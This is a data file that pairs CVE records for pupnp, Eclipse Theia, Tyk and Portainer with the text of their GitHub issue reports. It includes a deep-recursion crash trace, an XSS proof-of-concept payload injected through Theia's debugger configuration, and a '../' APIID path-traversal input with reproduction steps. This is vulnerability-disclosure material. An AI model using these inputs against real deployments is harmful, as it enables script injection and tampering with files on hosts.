115 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
116 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
117 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
118 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
119 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
120 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
121 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
122 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
123 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
124 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
125 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
126 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
127 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
128 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
129 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
130 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
131 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
132 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
133 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
134 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
135 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
136 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
137 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
138 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
139 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
140 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
141 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
142 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
143 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
144 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
145 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
146 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
147 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
148 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
149 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
150 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
151 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
152 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
153 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
154 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
155 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
156 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
157 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
158 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
159 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
160 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
161 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
162 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
163 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
164 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
165 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
166 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
167 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
168 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
169 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
170 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
171 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
172 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
173 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
174 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
175 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
176 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
177 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
178 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
179 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
180 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
181 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
182 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
183 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
184 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
185 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
186 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
187 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
188 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
189 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
190 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
191 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
192 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
193 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
194 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
195 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
196 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
197 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
198 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
199 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
200 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
201 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
202 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
203 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
204 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
205 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
206 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
207 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
208 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
209 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
210 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
211 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
212 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
213 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
214 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
215 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
216 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
217 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
218 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
219 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
220 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
221 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
222 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
223 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
224 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
225 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
226 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
227 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
228 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
229 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
230 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
231 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
232 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
233 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
234 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
235 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
236 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
237 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
238 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
239 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
240 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
241 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
242 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
243 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
244 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
245 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
246 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
247 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
248 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
249 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
250 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
251 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
252 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
253 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
254 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
255 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
```
| Too many nested tags will lead to stack space exhaustion, resulting in signal 11 (SIGSEGV) | https://api.github.com/repos/pupnp/pupnp/issues/249/comments | 15 | 2021-03-12T02:54:55Z | 2022-01-06T14:50:50Z | https://github.com/pupnp/pupnp/issues/249 | 829,708,638 | 249 | 1,754 |
CVE-2021-28161 | 2021-03-12T22:15:15.077 | In Eclipse Theia versions up to and including 1.8.0, in the debug console there is no HTML escaping, so arbitrary Javascript code can be injected. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "emo@eclipse.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/eclipse-theia/theia/issues/8794"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/eclipse-theia/theia/issues/8794"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eclipse:theia:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6229F48-421D-4A07-B017-8E6F07F4121E",
"versionEndExcluding": null,
"versionEndIncluding": "1.8.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/eclipse-theia/theia/issues/8794 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"eclipse-theia",
"theia"
] | ### Bug Description:
In the debug console there is no HTML escaping, so arbitrary Javascript code can be injected. I think the issue is `dangerouslySetInnerHTML` in [ansi-console-item.tsx](https://github.com/eclipse-theia/theia/blob/497452921c55fcda82e0ab50d79e4531fc1abf1b/packages/console/src/browser/ansi-console-item.tsx#L41) (L41)

I think this issue is similar to #7283
### Steps to Reproduce:
See also the [attached PoC video](https://github.com/eclipse-theia/theia/files/5611390/Theia_v1_XSS_Debug.zip).

### Additional Information
- Theia Version: Theia 1.8.0
### Questions
- Theia is an important open source project, but it hasn't set a Github security policy. Should it have one?
| XSS in Debug Console [Theia v1.8.0] | https://api.github.com/repos/eclipse-theia/theia/issues/8794/comments | 6 | 2020-11-28T23:36:58Z | 2021-04-19T23:06:57Z | https://github.com/eclipse-theia/theia/issues/8794 | 752,791,480 | 8,794 | 1,755 |
CVE-2021-28162 | 2021-03-12T22:15:15.157 | In Eclipse Theia versions up to and including 0.16.0, in the notification messages there is no HTML escaping, so Javascript code can run. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "emo@eclipse.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/eclipse-theia/theia/issues/7283"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/eclipse-theia/theia/issues/7283"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eclipse:theia:*:*:*:*:*:*:*:*",
"matchCriteriaId": "636CCCB3-F8BE-4506-84BA-8E7D21601BF0",
"versionEndExcluding": null,
"versionEndIncluding": "0.16.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"829"
] | 829 | https://github.com/eclipse-theia/theia/issues/7283 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"eclipse-theia",
"theia"
] | ### Description
In the notification messages there is no an HTML escaping, so Javascript code can run. I'm not sure, but I think the issue is in [packages/messages/src/browser/notification-component.tsx:76](https://github.com/eclipse-theia/theia/blob/1ca3ec37c079a6b316278cf292609653e57b8151/packages/messages/src/browser/notification-component.tsx#L76)
` <span dangerouslySetInnerHTML={{ __html: message }} onClick={this.onMessageClick} />`
In Electron app an arbitrary JS code can lead to dangerous exploits.
### Reproduction Steps
- Create a new project and create a new debugger configuration file `launch.json`
- In the `type` field write the Javascript payload (e.g. `<details open ontoggle=confirm(2)>`)
- Press **F5** to launch the debugger and see the alert box

**OS and Theia version:**
- Ubuntu 18.04
- Theia Electron Example 0.16.0
I think this bug is a vulnerability, I can exfiltrate data from victim's computer by using JS. Here a proof-of-concept video.
[Theia_PoC.zip](https://github.com/eclipse-theia/theia/files/4293788/Theia_PoC.zip)
| Javascript injection via notification messages | https://api.github.com/repos/eclipse-theia/theia/issues/7283/comments | 5 | 2020-03-05T15:45:25Z | 2021-03-12T21:40:07Z | https://github.com/eclipse-theia/theia/issues/7283 | 576,347,925 | 7,283 | 1,756 |
CVE-2021-23357 | 2021-03-15T17:15:21.597 | All versions of package github.com/tyktechnologies/tyk/gateway are vulnerable to Directory Traversal via the handleAddOrUpdateApi function. This function is able to delete arbitrary JSON files on the disk where Tyk is running via the management API. The APIID is provided by the user and this value is then used to create a file on disk. If there is a file found with the same name then it will be deleted and then re-created with the contents of the API creation request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 2.5,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TykTechnologies/tyk/issues/3390"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMTYKTECHNOLOGIESTYKGATEWAY-1078516"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TykTechnologies/tyk/issues/3390"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMTYKTECHNOLOGIESTYKGATEWAY-1078516"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tyk:tyk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "31F492C7-6DF7-4CCA-9B23-C2063688FDB8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/TykTechnologies/tyk/issues/3390 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"TykTechnologies",
"tyk"
] | **Branch/Environment/Version**
- Branch/Version: https://github.com/TykTechnologies/tyk/tree/v3.0.1
- Environment: On-Prem, Linux
**Describe the bug**
The function at https://github.com/TykTechnologies/tyk/blob/v3.0.1/gateway/api.go#L771 is able to delete arbitrary JSON files on disk where Tyk is running via the management API. The APIID is provided by the user and this value is then used to create a file on disk. If there is a file found with the same name then it will be deleted and then re-created with the contents of the API creation request.
Assume I create an API with APIID="../../something" - if there is a JSON file at that location called something.json, it will be deleted and replaced with the API definition object from my request.
This means 2 things:
- Actors are able to traverse the file system of the Tyk host
- Actors are able to delete and modify any JSON file on the Tyk host
**Reproduction steps**
- Create a file outside of where Tyk is storing the API definitions eg ../something.json
- Make a request to create an API with APIID '../something'
- Observe file get deleted and then overwritten
**Actual behavior**
Tyk deletes/modifies arbitrary JSON files
**Expected behavior**
Tyk should not use user defined input as part of file names. Recommended that the API gateway maintains a mapping between apiIDs and a gateway generated FileName i.e. a UUID.
**Screenshots/Video**
N/A
**Logs (debug mode or log file):**
N/A
**Configuration (tyk config file):**
N/A
**Additional context**
N/A
| [TT-1397] Security: Path Traversal Bug - Able to delete/modify arbitrary JSON files via management API | https://api.github.com/repos/TykTechnologies/tyk/issues/3390/comments | 1 | 2020-11-17T23:13:51Z | 2023-04-12T16:38:52Z | https://github.com/TykTechnologies/tyk/issues/3390 | 745,156,773 | 3,390 | 1,757 |
CVE-2020-24263 | 2021-03-16T15:15:12.530 | Portainer 1.24.1 and earlier is affected by an insecure permissions vulnerability that may lead to remote arbitrary code execution. A non-admin user is allowed to spawn new containers with critical capabilities such as SYS_MODULE, which can be used to take over the Docker host. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
